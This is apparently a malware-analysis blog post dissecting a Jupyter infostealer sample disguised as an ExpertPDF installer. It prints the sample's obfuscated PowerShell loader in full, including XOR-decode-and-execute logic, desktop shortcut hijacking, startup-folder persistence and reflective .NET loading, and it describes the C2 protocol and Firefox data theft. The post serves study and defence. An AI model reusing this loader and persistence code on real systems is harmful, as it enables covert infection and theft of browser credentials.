When I hear the word “Jupyter”, I think about the massive planet “Jupiter” and “Jupyter Notebooks”, part of the modern-day threat hunter’s toolstack. However, researchers at cybersecurity company Morphisec recently disclosed details about a new player in the malware scene with an identical name: Jupyter.
Jupyter is an infostealer trojan that primarily attempts to collect and exfiltrate sensitive information from web browsers including Chrome, Chromium and Firefox. Commonly sold on underground hacking forums, infostealers continue to evolve in sophistication. Jupyter malware is embedded within a setup/installer and disguised as legitimate software. It even uses sensible file icons and file names to induce the victim into running the installer. However, apart from launching an installation wizard, it drops a PowerShell script that initiates a complex series of events and capabilities including classic in-memory .NET tradecraft, establishing persistence and C2 communication. The malware is evasive by nature and maintained a 0% detection rate on VirusTotal over the last 6 months.
In this blog post we will walk through the analysis of a Jupyter malware sample that I came across two weeks ago. A summarized overview of the malware’s behavior including its forensic telemetry (red: process execution, purple: .NET assembly load events, blue: file creation, green: network activity) is illustrated below.
Static Property Analysis
This particular specimen of Jupyter malware impersonates the PDF converter tool “ExpertPDF” from software firm AvanQuest. The file is named Sample-Invitation-Letter-For-Event-Participation.exe and uses a product icon that looks similar to the logo of Adobe Reader. Another element that stands out is its rather large file size (148MB).
By examining the static properties of the executable, we can identify whether the specimen is signed. With the help of disitool, a Python script developed by Didier Stevens, we can extract and store the file’s binary signature. The OpenSSL command can then be used to convert the DER-encoded signature into a readable text format.
python3 disitool.py extract Sample-Invitation-Letter-For-Event-Participation.exe malware-sig.der
openssl pkcs7 -inform DER -print_certs -text -in malware-sig.der > malware-sig.txt
Next, we use peframe to inspect the various static attributes specified in the PE header. As the output of the tool indicates, Inno Setup was used to generate the installer. Peframe also discovered a reference to the installer’s former file name: SetupLdr.exe. Some of the other fields, such as FileDescription and the subject information of the certificate, also have unusual values.
Meta data found [9]
------------------------------------------------------------
LegalCopyright
FileVersion
CompanyName
Comments This installation was built with Inno Setup.
ProductName Annuversuary Tech Software Production
ProductVersion 17.43.11.4
FileDescription Annuversuary Tech Software Production Setup
OriginalFileName
Translation 0x0000 0x04b0
File name discovered [2]
------------------------------------------------------------
Executable ExpertPDF.exe
Executable SetupLdr.exe
disitool output
------------------------------------------------------------
Serial Number 11:39:db:b0:27:76:fa:0f:0c:0d:f3:0b
Issuer C=BE, O=GlobalSign nv-sa, CN=GlobalSign Extended Validation CodeSigning CA -
Not Before Sep 4 10:09:10 2020 GMT
Not After Sep 5 10:09:10 2021 GMT
Subject businessCategory=Private Organization/serialNumber=114231100 1744/
1.3.6.1.4.1.311.60.2.1.3=RU/1.3.6.1.4.1.311.60.2.1.2=Krasnodar Krai,
C=RU, ST=Krasnodar Krai, L=Krasnodar/street=ul Solnechnaya, 15/5, O=ITM LLC, CN=ITM LLC
Obfuscated PowerShell Script
Upon execution, the installer unpacks itself into the user’s temp folder and runs the legitimate ExpertPDF installer, Expert_PDF.exe. The following installation wizard screen is displayed:
Shortly after, a PowerShell process is spawned in the background with the following command line arguments:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\admin\AppData\Local\Temp\f1e27915a7a85333ae47f3a40f835751.txt';$xk='ycmtKhauWTxMfEIvqADlBrHeCVRPzFJidwjQSpLZGkgNYUXOnbos';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
Replace the command separator (semicolon) with newlines to make the code more legible:
$p='C:\Users\admin\AppData\Local\Temp\f1e27915a7a85333ae47f3a40f835751.txt'
$xk='ycmtKhauWTxMfEIvqADlBrHeCVRPzFJidwjQSpLZGkgNYUXOnbos'
$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));
remove-item $p;
for($i=0;$i -lt $xb.count;){
for($j=0;$j -lt $xk.length;$j++){
$xb[$i]=$xb[$i] -bxor $xk[$j];
$i++;
if($i -ge $xb.count){
$j=$xk.length
}
}
}
$xb=[System.Text.Encoding]::UTF8.GetString($xb);
iex $xb;
The PowerShell command first reads a text file from the user’s temp directory (AppData\Local\Temp). The file path is held in variable $p, the XOR key in variable $xk, and the Base64-decoded content of the file in variable $xb. On line 4, the Remove-Item cmdlet removes the text file from the file system. By deleting the file, the malware authors probably attempted to complicate the reverse engineering process and minimize the footprint on the target system. Ironically, the decoding sequence takes up a substantial amount of time, making it trivial to grab the text file before deletion. The text file, 185KB in size, is processed through the following decoding sequence: Base64 > byte array > XOR with the repeating key > UTF-8 string. Finally, the iex $xb command (iex is an alias for Invoke-Expression) executes the resulting string as PowerShell code.
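For analysts who prefer to decode the first stage offline rather than re-running the PowerShell, the same sequence can be sketched in Python. This is a minimal sketch that assumes the text file has already been copied out of the temp folder; the function names are mine, and encode_stage exists only to build test input.

```python
import base64
from itertools import cycle


def decode_stage(b64_text: str, key: str) -> str:
    """Base64-decode, XOR with the repeating key, return the UTF-8 text."""
    raw = base64.b64decode(b64_text)
    # The key consists of ASCII letters, so each character maps to one byte.
    key_bytes = key.encode("ascii")
    plain = bytes(b ^ k for b, k in zip(raw, cycle(key_bytes)))
    return plain.decode("utf-8")


def encode_stage(script: str, key: str) -> str:
    """Inverse of decode_stage (hypothetical helper, only used for testing)."""
    key_bytes = key.encode("ascii")
    data = script.encode("utf-8")
    xored = bytes(b ^ k for b, k in zip(data, cycle(key_bytes)))
    return base64.b64encode(xored).decode("ascii")
```

Calling decode_stage(open(path).read(), 'ycmtKhauWTxMfEIvqADlBrHeCVRPzFJidwjQSpLZGkgNYUXOnbos') on a saved copy of the text file should yield the second PowerShell script without executing anything.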
We will run the same PowerShell script again. However, this time we will omit the Remove-Item cmdlet on line 4 and change the last line of code to $xb | Out-File C:\Users\pierre\Desktop\Jupyter\xb.txt. This way, we can save the content of $xb into a separate file.
The exported text file comprises yet another obfuscated PowerShell script. You can find a copy of this script on my GitHub, here. Okay, this one looks even more intimidating, right? To make our life easier, we will break the code into seven pieces.
Code portion I: generates random text strings and creates directory
$a90d284151e49c9ef9314f790a7e0=0
$a6a7167eb754a9ae9b0daa37b9060=[mAth]::RouND((GEt-dATe).TofiLetime() / 10000)
$a40a3a3c482402bda72b0583cdc58=""
$aafe563b6694dcb0874870326fdad=""
$a54a30d5d1b4a4b6eacff52a2a8ca=""
WhILe(([mATh]::ROuNd((GET-dAtE).toFIlETimE() / 10000)-$a6a7167eb754a9ae9b0daa37b9060 -lT 40000)-oR($a90d284151e49c9ef9314f790a7e0 -eQ 0)){
$a40a3a3c482402bda72b0583cdc58=-jOin ((65..90)+(97..122)|geT-randOM -count 76|%{[ChaR]$_})
$aafe563b6694dcb0874870326fdad=-Join ((65..90)+(97..122)|get-rAnDOM -coUNT 4|%{[cHaR]$_})
$a54a30d5d1b4a4b6eacff52a2a8ca=-Join ((65..90)+(97..122)|geT-RaNDom -coUnt 8|%{[cHAR]$_})
sTaRt-sLeEp -mILlISEcoNdS 10
$a90d284151e49c9ef9314f790a7e0=$a90d284151e49c9ef9314f790a7e0+1
}
$a9c46b5e38445f9fc4a990bbf287d="$EnV:apPDaTa\MICRosOfT\"+$aafe563b6694dcb0874870326fdad
nEw-Item -ItemtYpe DIRecToRy -FoRce -path $a9c46b5e38445f9fc4a990bbf287d
The loop builds strings from letters selected by their ASCII codes: 65-90 (A-Z) and 97-122 (a-z). On each pass it assigns three randomized text strings to individual variables; the current date and time only control how long the loop keeps regenerating them. The script requests 76, 4 and 8 characters, respectively. Because Get-Random draws without repetition from a pool of only 52 letters, the first string is capped at 52 characters.
The last line of code creates a directory in the user’s AppData\Roaming\Microsoft folder. The folder name is the generated 4-character string. Example of the folder created in my sandbox: C:\Users\pierre\AppData\Roaming\Microsoft\xolW.
Code portion II: processes Base64 blob
$a3c1f82ccd14a282b714d6a2f793e=$a9c46b5e38445f9fc4a990bbf287d+'\'+$a40a3a3c482402bda72b0583cdc58
$a7d6af859e24caa0d3c82e326c90b=$a9c46b5e38445f9fc4a990bbf287d+'\'+$a54a30d5d1b4a4b6eacff52a2a8ca
$abe0faa1f2c432afebeb0a15eb727=[sySTEm.CoNVERT]::FrOMbaSe64STRInG($acd48ffe17a452b4954a796b45146)
$abe0faa1f2c432afebeb0a15eb727|SEt-CONTENT $a3c1f82ccd14a282b714d6a2f793e -eNCodINg byTE
Line 1-2: Declares two new variables that hold file paths inside the folder that has just been created. Each path appends one of the randomized strings (the long one and the 8-character one, respectively) to the folder path to form a file name.
Line 3-4: Reads in the Base64 blob at the top of the script and converts it to a byte array. Finally, the byte array is written to a file on disk. The file’s location consists of two parts: the recently created folder and the long random file name (52 characters in practice, as the example shows). Example of the file created in my sandbox: C:\Users\pierre\AppData\Roaming\Microsoft\xolW\eXHLdSnByszphulCNKrDAoTvxJkGMaVQPtfEZUqmjwRWObFcgIYi.
Code portion III: suspicious cmd script
$a2ab4e6fb1848897c1b174e7c2cdc=NeW-oBJEcT -ComOBjEct wScRIPt.shEll
$a67eee407604a89ba2a431298f41f='@"%APPDAtA%\mICrOsoft\'+$aafe563b6694dcb0874870326fdad+'\'+$a54a30d5d1b4a4b6eacff52a2a8ca+'.CMd"'
Line 1: Creates a reference to the WScript.Shell COM object and stores it in a variable.
Line 2: Declares a new variable which holds the file path to a CMD file (batch script). The ‘cmd’ file extension is appended to the 8-character text string that was assigned to variable $a54a30d5d1b4a4b6eacff52a2a8ca earlier. Example value of the variable in my sandbox: @"%APPDAtA%\mICrOsoft\xolW\LniOIybC.CMd".
Code portion IV: manipulates shortcut files
$a52ce24ea9c482b7251db482a9536=Get-cHILDIteM -pAth "$eNv:UsERprOfile\DEskToP\" -FiltEr '*.Lnk'|wHere-oBJeCT { $_.atTrIbuteS -ne "dirEcTOrY"}|SELEcT -eXpANDpROpeRTY FulLName
$a25f6f35cb04d0868defae7396fa7=Get-CHIldItEM -paTh "$eNv:usErprOfiLe\..\pUblIC\desktOP\" -fIlter '*.Lnk'|WheRe-ObJECt { $_.atTrIbutES -nE "dIRectory"}|sELECT -ExPAndProPerty FUlLNamE
$a52ce24ea9c482b7251db482a9536=$a52ce24ea9c482b7251db482a9536+$a25f6f35cb04d0868defae7396fa7
Foreach($a40b6e85954495b1875fcc0962d84 iN $a52ce24ea9c482b7251db482a9536){
TRy{ $a40b6e85954495b1875fcc0962d84=$a2ab4e6fb1848897c1b174e7c2cdc.crEATeSHOrtcut($a40b6e85954495b1875fcc0962d84)
$af94645bae548f8a708bf7aef9a9e=$a40b6e85954495b1875fcc0962d84.tArgetPAtH
$a1e5a6d32cb44085bac607aecc614=$af94645bae548f8a708bf7aef9a9e
iF(($af94645bae548f8a708bf7aef9a9e -lIkE '*CmD.ExE*') -OR (-Not ($af94645bae548f8a708bf7aef9a9e -like '*\*.*')) -oR (-NOt (TEsT-PATh $af94645bae548f8a708bf7aef9a9e)) -Or ($a40b6e85954495b1875fcc0962d84.ArguMEnTS.LenGTH -GT 0)){
$a40b6e85954495b1875fcc0962d84.save()
}elSE{
$a40b6e85954495b1875fcc0962d84.tArGeTPATh='CMd'
$a40b6e85954495b1875fcc0962d84.argUMenTS='/C @sTarT "" "'+$af94645bae548f8a708bf7aef9a9e+'" && '+$a67eee407604a89ba2a431298f41f
$a40b6e85954495b1875fcc0962d84.wiNDOWStYlE=7
$a40b6e85954495b1875fcc0962d84.iconlOCATION=$a1e5a6d32cb44085bac607aecc614
$a40b6e85954495b1875fcc0962d84.SaVe()
}
}
fINALly{}
}
Line 1-2: Enumerates all .LNK files (shortcuts) in the current user’s and the Public Desktop folders. For each shortcut, it only extracts the FullName property, which represents the full file path to the LNK file. For example: C:\Users\pierre\Desktop\Internet Explorer.lnk.
Line 3: Merges the two lists of shortcuts and assigns the result to a single variable.
The remainder of the PowerShell code attempts to manipulate the target path of the collected shortcut files. The target path is normally the file path to a program’s executable. For example, a typical target path for Internet Explorer is: C:\Program Files (x86)\Internet Explorer\iexplore.exe. Shortcuts that already point to cmd.exe, already carry arguments, or have a target that does not exist are left unchanged. For every other shortcut, the script sets the target to cmd and moves the original executable, followed by the file location of the CMD script, into the arguments. Going back to our example, this is what the new target path of Internet Explorer looks like after running the PowerShell code:
C:\WINDOWS\system32\CMd.exe /C @sTarT "" "C:\Program Files (x86)\Internet Explorer\iexplore.exe" && @"%APPDAtA%\mICrOsoft\xolW\LniOIybC.CMd"
Clandestine techniques are used to evade/subvert detection:
- The original file location of the executable is preserved in the target path. Although the program will start indirectly via cmd.exe, the shortcut will continue to work.
- The WindowStyle property is set to the value ‘7’. This minimizes the console window upon execution of the CMD batch file.
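To hunt for shortcuts that were rewritten this way, the target path and arguments of each LNK file can be checked against the pattern shown in the example. The sketch below assumes the two fields have already been extracted by an LNK parser of your choice; the regular expression is modelled on the single example above and the function name is hypothetical.

```python
import re

# Pattern modelled on the rewritten shortcut from the example:
#   /C @sTarT "" "<original target>" && @"<path>.CMd"
HIJACK_ARGS = re.compile(
    r'/c\s+@?start\s+""\s+"(?P<original>[^"]+)"\s*&&\s*@?"(?P<script>[^"]+\.cmd)"',
    re.IGNORECASE,
)


def inspect_shortcut(target_path: str, arguments: str):
    """Return (original_target, script_path) if the shortcut matches, else None."""
    # Only shortcuts whose target is cmd / cmd.exe are of interest.
    name = target_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if name not in ("cmd", "cmd.exe"):
        return None
    match = HIJACK_ARGS.search(arguments)
    if match is None:
        return None
    return match.group("original"), match.group("script")
```

A match returns both the original program and the injected batch file, which makes it straightforward to restore the shortcut and to collect the script path as an indicator.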
Code portion V: creates persistence via startup folder
$a4fbc40b6ad435bb770e66ae2c559=("$"+"abab188938847d9e028b83169bd97=$"+"eNV:aPPdata+'\mIcROSOfT\WiNdoWS\stART MEnu\pRogrAMS\StaRTuP\add375f568547c9bc8c38d92878f1.LNK'
iF(-NoT(TEst-path $"+"abab188938847d9e028b83169bd97)){$"+"a1fe836cd2f4a584c8b26df3c899e=NEW-oBJect -cOmOBjECT wsCRipt.ShELL
$"+"a887c3fc4114a6ae35adcfe97686a=$"+"a1fe836cd2f4a584c8b26df3c899e.crEatEsHORtcuT($"+"abab188938847d9e028b83169bd97)
$"+"a887c3fc4114a6ae35adcfe97686a.WIndoWstYle=7
$"+"a887c3fc4114a6ae35adcfe97686a.TArGETPATh='"+$a7d6af859e24caa0d3c82e326c90b+".CMD'
$"+"a887c3fc4114a6ae35adcfe97686a.save()}
Declares a new variable which holds the location of a LNK file. The shortcut is saved in the current user’s startup directory under the hard-coded name add375f568547c9bc8c38d92878f1.LNK, with the file location of the CMD script as its target path.
This piece of code relies on a common persistence technique: placing a shortcut that points to the suspicious CMD script in the user’s startup folder.
Code portion VI: loads self-contained assembly in memory
iF((GET-prOCEss -nAME '*PoWERShell*').count -lT 15){
$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk='
$afc49a7db894a1989bc60a8b4dcd7=[SySTem.io.fILe]::reaDallByteS([sYsTEm.tEXT.eNcODiNg]::utf8.gEtstRiNG([sYSTem.coNVERt]::FRoMbaSe64STrinG('QzpcVXNlcnNcUkVNXEFwcERhdGFcUm9hbWluZ1xNSUNSb3NPZlRccGtzVVxSemJtcGZRRmp2c2NoTUdUQkN3Vm5xZUxXSlBJU2dFWEROS3Jab0FIYXlrVXhPWWx1dGRp')))
write-host $a41841141c743b8d10df14c793537
For($a0bf2735f83489b6c01ebc52dd3ad=0; $a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count){
FOR($ad3c9c588084759dffa6395ab35e5=0; $ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length; $ad3c9c588084759dffa6395ab35e5++){
$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -BxOR $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5]; $a0bf2735f83489b6c01ebc52dd3ad++
if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){
$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length
}
}
}
[sySTEm.rEflEcTiON.AsSeMBLy]::lOad($afc49a7db894a1989bc60a8b4dcd7)
[D.M]::Run()
}
Reads a file from disk into a byte array (the file path is stored as a Base64 string) and XOR-decodes the bytes with the key string stored in the first variable of the block. The whole block only runs when fewer than 15 PowerShell processes are active. The last two lines in this code portion play a crucial role in the attack chain of the malware. Assembly.Load(), a method in the System.Reflection namespace, reflectively loads a .NET assembly from a byte array directly into the memory of the current process. The last line of code invokes the main method of the assembly: Run().
Code portion VII: stores PowerShell code in batch file
$a9787d755a5489be68be015546667='@CMD /c POWeRSheLl -w hIdDEn -CoMmaNd "'.ToLOwer()+$a4fbc40b6ad435bb770e66ae2c559+'"'
$a9787d755a5489be68be015546667|set-coNTEnT ($a7d6af859e24caa0d3c82e326c90b+".Cmd") -enCODInG oEm
Copies the PowerShell code portions V and VI into the CMD script. This ensures that the assembly will be loaded into memory when the user:
- Logs on to the system - through the shortcut in the user’s startup folder.
- Double-clicks a desktop shortcut - through the manipulated target path.
The content of the batch file is converted to OEM encoding, the format for MS-DOS and console programs.
Dumping the .NET assembly
As outlined in the previous section, the PowerShell script decodes an embedded resource and loads it as a .NET assembly in memory. We could use an arbitrary .NET unpacking tool to dump the assembly from the PowerShell process. However, it could exit prematurely or take advantage of other evasion/obfuscation techniques. Therefore, we opt for a managed debugging approach to dump the .NET assembly from memory. To accomplish this, we will use the Windows Debugger (WinDBG) tool, including the SOS extension.
In order to debug managed code we must first load the SOS debugging library into WinDBG:
0:000> .loadby sos clr
Next, we put a breakpoint on the Assembly.Load() method. The !bpmd command can set breakpoints on JIT-compiled (managed) methods, including those of the .NET Framework itself. It requires two arguments: (1) the DLL in which the method is located and (2) the name of the method.
0:001> !bpmd mscorlib.dll System.Reflection.Assembly.Load
Found 8 methods in module 6da81000...
MethodDesc = 6db3fe60
MethodDesc = 6db3fe8c
MethodDesc = 6db3fe98
MethodDesc = 6db3fea4
MethodDesc = 6db3fec8
MethodDesc = 6db3fee0
MethodDesc = 6db3feec
MethodDesc = 6db3fef8
Setting breakpoint: bp 6E5D9B35 [System.Reflection.Assembly.Load(Byte[], Byte[], System.Security.Policy.Evidence)]
Setting breakpoint: bp 6E5D9A8B [System.Reflection.Assembly.Load(Byte[], Byte[], System.Security.SecurityContextSource)]
Setting breakpoint: bp 6E5D9A4F [System.Reflection.Assembly.Load(Byte[], Byte[])]
Setting breakpoint: bp 6E5D99E4 [System.Reflection.Assembly.Load(Byte[])]
Setting breakpoint: bp 6DE0F7B9 [System.Reflection.Assembly.Load(System.Reflection.AssemblyName, System.Security.Policy.Evidence)]
Setting breakpoint: bp 6DE39C49 [System.Reflection.Assembly.Load(System.Reflection.AssemblyName)]
Setting breakpoint: bp 6E5D9985 [System.Reflection.Assembly.Load(System.String, System.Security.Policy.Evidence)]
Setting breakpoint: bp 6DE89979 [System.Reflection.Assembly.Load(System.String)]
Adding pending breakpoints…
After setting the breakpoints, we will initialize CLR and allow execution of the PowerShell script by pressing ‘g’:
0:002> g
The overload we are interested in is Load(Byte[]). The !CLRStack command lists the methods on the managed stack and, with the -p option, their parameters. The output of this command shows the rawAssembly parameter and the associated memory address:
0:003> !CLRStack -p
OS Thread Id: 0x1a1c (19)
Child SP IP Call Site
0982e554 6e5d99e4 System.Reflection.Assembly.Load(Byte[])
PARAMETERS:
rawAssembly (<CLR reg>) = 0x0631d528
The parameters passed to a .NET method are typically stored on the stack (ESP). However, this is only applicable for .NET version 4. As our assembly is compiled in .NET version 3.5, the arguments are stored in the ECX register instead.
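ECX holds the address of the byte array object (0x0631d528). The first DWORD at that address (6df31ab0) is the object’s MethodTable pointer, and the second DWORD (00019000) is the number of elements in the array: 0x19000 = 102400 bytes. The array data itself starts at offset 8.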
0:004> dd ecx
0631d528 6df31ab0 00019000 00905a4d 00000003
0631d538 00000004 0000ffff 000000b8 00000000
0631d548 00000040 00000000 00000000 00000000
0631d558 00000000 00000000 00000000 00000000
0631d568 00000000 00000080 0eba1f0e cd09b400
0631d578 4c01b821 685421cd 70207369 72676f72
0631d588 63206d61 6f6e6e61 65622074 6e757220
0631d598 206e6920 20534f44 65646f6d 0a0d0d2e
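The layout of the first three DWORDs can be double-checked outside the debugger. The sketch below hard-codes the first 12 bytes from the dd output in little-endian byte order and splits them into the MethodTable pointer, the element count and the first two data bytes; the function name is mine and the layout assumption (8-byte header on a 32-bit process) comes from the dump itself.

```python
import struct


def parse_byte_array_header(dump: bytes):
    """Split a 32-bit System.Byte[] object into (method_table, length, magic)."""
    # Two little-endian DWORDs: MethodTable pointer, then element count.
    method_table, length = struct.unpack_from("<II", dump, 0)
    # The array data starts at offset 8; keep its first two bytes.
    return method_table, length, dump[8:10]


# DWORDs 6df31ab0 00019000 00905a4d as they sit in memory (little-endian).
header = bytes.fromhex("b01af36d" "00900100" "4d5a9000")
method_table, length, magic = parse_byte_array_header(header)
print(hex(method_table), length, magic)
```

The element count of 102400 and the MZ bytes at offset 8 are the two values needed for the memory dump later on.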
The db command can dump a memory region in byte/ASCII format. Skipping the 8-byte array header, the output starts with the MZ magic bytes (hex: 4d 5a) of a PE file, which indicates we are on the right track.
0:005> db ecx+8 L16
0631d530 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ..............
0631d540 b8 00 00 00 00 00
To show more details (size, content etc.) of the rawAssembly object, we can use the !DumpObj command:
0:006> !DumpObj /d 0x0631d528
Name: System.Byte[]
MethodTable: 6df31ab0
EEClass: 6db05cf8
Size: 102412(0x1900c) bytes
Array: Rank 1, Number of elements 102400, Type Byte (Print Array)
Content: MZ......................@....................................
...........!..L.!This program cannot be run in DOS mode....$.......
Fields:
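Finally, based on the address of the array data (object address + 8) and the number of elements (102400 = 0x19000), we dump the .NET DLL assembly to disk. Note that WinDBG interprets the length as hexadecimal by default, and that the object size reported by DumpObj (102412) includes the 12-byte object overhead:
0:007> .writemem C:\Users\pierre\Desktop\Jupyter\dump_pierre.dll 0x0631d528+8 L0x19000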
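Before opening the dump in a decompiler, a quick sanity check helps confirm that the offset and length were right. This is a minimal sketch that only checks the MZ magic and the PE signature located via the e_lfanew field at offset 0x3C; it does not validate the .NET metadata, and the function name is hypothetical.

```python
import struct


def looks_like_pe(data: bytes) -> bool:
    """Check the MZ magic and the PE signature that e_lfanew points to."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    # e_lfanew: little-endian DWORD at offset 0x3C of the DOS header.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
```

Usage would look like looks_like_pe(open(r"C:\Users\pierre\Desktop\Jupyter\dump_pierre.dll", "rb").read()). In the dd output above, the DWORD at offset 0x3C is 00000080, so the PE signature is expected at offset 0x80 of the dumped file.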
Decompiling the .NET assembly
A .NET decompiler like dnSpy operates at a higher level and can reconstruct C# code, close to the original source code, with minimal effort. dnSpy is able to process the structure of the dumped .NET DLL assembly (original filename: 331be178-6e21-4292-a5e1-8175d61f5791.dll) and display a hierarchy of namespaces, classes and methods:
The decompiled code does not appear to be obfuscated. In fact, the methods and classes have meaningful names and seem to reveal the intent of the code. Time to take a closer look!
‘LdrConfig’ class
The LdrConfig class contains public string objects that hold the hard-coded IP-address of the C2 server along with a XOR-key. Remember the reference to “SetupLdr.exe” that we spotted during our static property analysis? LDR probably stands for “Loader” and the value “DR/1.6” presumably refers to the specific version of the malware.
‘GetHWID’ method
Uses the GenRandomString() method to generate a randomized string of 32 characters and saves this value into solarmarker.dat, a file in the user’s AppData folder. It serves as a unique identifier that the trojan will use for future C2 communication.
‘Req’ method
Declares the appropriate HTTP headers for sending HTTP POST requests and JSON-formatted payloads to the C2 server.
‘Run’ method
The main method of the assembly; it calls the remaining methods during the various phases of C2 communication.
- DecryptRaw, DecryptStr, EncryptStr, EncryptXor: to encode and decode payloads.
- GetUserName, GetWinVersion, GetWorkGroup, Is64x, IsAdmin: to gather system information and other details from the infected system.
C2 Communication
When I detonated the malware sample in my sandbox, the C2 infrastructure was still active. I managed to capture all of the network traffic between my sandbox and the C2 server. The different phases of C2 communication are illustrated below:
Initial call-back
During the initial callback, the victim sends a custom HTTP POST request to the (hardcoded) IP-address of the C2 server. The POST request, depicted below, contains an encoded JSON object in the body of the HTTP message.
The decoding algorithm, based on Base64 and XOR, can be found in the DecryptRaw method of the assembly.
My tool of choice for decoding data is CyberChef. We can create a CyberChef recipe to decode the JSON payloads sent through the C2 channel. One of the “ingredients” is the hardcoded XOR key, declared in the LdrConfig class.
The decoded JSON-object specifies the ‘ping’ instruction. This callback message transmits the following information to the C2 server:
- The hwid that was generated through the ‘GetHWID’ method.
- System information: including the hostname, operating system and architecture.
- The privileges of the current user.
- The malware/loader version.
Assigns file task
We can use the same recipe to decode the corresponding payload in the HTTP response body. The C2 server assigns a unique task_id to its victim and refers to a PowerShell (ps1) file. The purpose of this instruction will make more sense when we analyze the next HTTP request/response pair.
{
"status": "file",
"type": "ps1",
"task_id": "4867a305-2830-11eb-9c2e-ac1f6bf6e446"
}
The C2 server most likely maintains a local database to keep track of infected systems, utilizing the hwid as a unique identifier. As soon as a new infected system checks-in, the C2 server will generate and assign a new task_id.
Download second-stage PowerShell script
Now this is the part where things get interesting. The decoded JSON-object in the next HTTP request triggers the “get_file” instruction. This will request a PowerShell script from the C2 server, based on the task_id.
{
"action": "get_file",
"hwid": "IFU057AMU0FJADRXKOFTSXEDRKOJ0WJI",
"task_id": "4867a305-2830-11eb-9c2e-ac1f6bf6e446",
"protocol_version": 1
}
The size of the self-contained PowerShell script in the body of the HTTP response message is 249096 bytes, indicated by the Content-Length header.
As reflected in the decompiled code, the second-stage PowerShell script is decoded and saved in the user’s temp directory. The GenRandomString method assigns the script a random filename. The PowerShell one-liner shown below spawns another child instance of powershell.exe and executes the script.
In the third HTTP request, the infected system sends an acknowledgement, informing the C2 server that the implant has been successfully installed.
{
"action": "change_status",
"hwid": "IFU057AMU0FJADRXKOFTSXEDRKOJ0WJI",
"task_id": "4867a305-2830-11eb-9c2e-ac1f6bf6e446",
"is_success": true,
"protocol_version": 1
}
And finally, the C2 server assigns the ‘idle’ status to the infected system. It will now continue to beacon out at a regular interval, waiting for the next instruction.
{
"status": "idle"
}
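When reviewing a longer capture, it helps to fold the decoded messages into one record per task. The sketch below assumes the payloads have already been decoded into Python dictionaries; it only relies on the field names visible in the JSON objects above (status, type, action, task_id, is_success), and the function name is mine.

```python
def summarize_tasks(messages):
    """Group decoded C2 messages by task_id and track how far each task got."""
    tasks = {}
    for msg in messages:
        task_id = msg.get("task_id")
        if task_id is None:
            # Messages such as {"status": "idle"} carry no task.
            continue
        entry = tasks.setdefault(
            task_id, {"type": None, "requested": False, "success": None}
        )
        if msg.get("status") == "file":
            # Server assigns a file task and names its type (e.g. ps1).
            entry["type"] = msg.get("type")
        elif msg.get("action") == "get_file":
            # Client asks for the file that belongs to the task.
            entry["requested"] = True
        elif msg.get("action") == "change_status":
            # Client reports whether the task succeeded.
            entry["success"] = msg.get("is_success")
    return tasks
```

Fed with the four decoded messages from this exchange, the function returns a single task of type ps1 that was requested and reported as successful.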
We can conclude that this .NET assembly serves as a RAT to drop arbitrary ps1 (or exe) files on the target system.
Analyzing the second-stage PowerShell script
In the previous section we’ve learned that the second-stage PowerShell script was dropped in the user’s temp directory. After viewing its content, it becomes clear that there’s a resemblance between this script and the one we’ve analyzed earlier. The same code structure, obfuscation layers, .NET execution technique and other patterns can be recognized. We can dump the self-contained .NET assembly in the body of the script by repeating the same steps as detailed above.
Like the two PowerShell scripts, the two .NET assemblies also have a lot in common. There is an overlap in method definitions; for example, GenRandomString and GetHWID look familiar to us. Other methods like ReqGet, ReqPOST and ReqPOSTX indicate active development of the malware’s call-home capability.
dnSpy shows that the root namespace of the .NET assembly is labeled jupyter. The jupyter method in this namespace contains two (constant) string objects:
- addr: URL with another IP-address that belongs to the C2 infrastructure.
- Stubversion: the (updated) loader’s version.
Just under the ‘Jupyter’ namespace, we can see the classes “chromium”, “firefox” and “hvnc”. These entities represent the heart of the infostealer technology, exposing its main capability: obtaining private data from popular web browsers including Google Chrome and Mozilla Firefox. Let’s analyze the decompiled methods of the firefox class.
‘steal_data’ method
If Firefox is installed on the victim’s system, it iterates through each Firefox profile directory and verifies the existence of the following files:
- key4.db - the key used to encrypt the browser credentials stored in logins.json.
- formhistory.sqlite - autocomplete items.
- cert9.db - (custom) certificates/certificate revocation lists.
- cookies.sqlite - cookie sessions.
In the code there’s a conditional statement that verifies whether ALL of these sensitive files exist on disk. The malware authors presumably implemented this check to focus on systems of interest or as a sandbox detection technique.
‘load_file’ method
If the Firefox process happens to be running on the victim’s system, it has applied a write-lock on the target files. No other process can activate a read or write lock until it is relinquished. Therefore, the five files are first copied to the user’s temp directory. It then assigns each file an 8-character file name. Before it deletes each file, the file’s content is read into a byte array in memory.
‘pack_data’ method
The pack_data method converts each byte array to a Base64 string. The encoded files are formatted as individual elements in a JSON object and exfiltrated over HTTP.
